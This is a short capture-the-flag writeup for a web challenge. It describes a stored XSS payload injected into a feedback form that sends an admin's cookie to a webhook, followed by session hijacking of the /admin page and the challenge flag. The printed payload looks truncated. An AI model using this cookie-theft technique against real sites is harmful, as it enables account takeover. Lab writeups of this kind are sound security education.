CTFtime.org / Cyber Apocalypse CTF 2022: Intergalactic Chase / Kryptos Support / Writeup

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/1.png)

The first page you are greeted with is an entry page for leaving feedback for the Kryptos Vault

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/2.png)

and a "backend" button that we can't click but poking around it leads us to `/admin` and the following login

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/3.png)

Just throwing a simple xss payload at the feedback page works right off the bat!

```html
<script>document.write(';)</script>
```

This sends us back a webhook request with a cookie. The admin cookie! Setting it as our own we can finally get to the backend and retreive our flag

![](https://newyork167.github.io/images/2022/cyber_apocalypse_2022/kryptos_support/4.png)

`Flag: HTB{x55_4nd_id0rs_ar3_fun!!}`

Original writeup (https://newyork167.github.io/infosec/cyber%20apocalypse%202022/web/2022/05/19/cyber-apocalypse-2022-writeups-web-kryptos-support.html).

Kryptos Support

Comments

Sign in with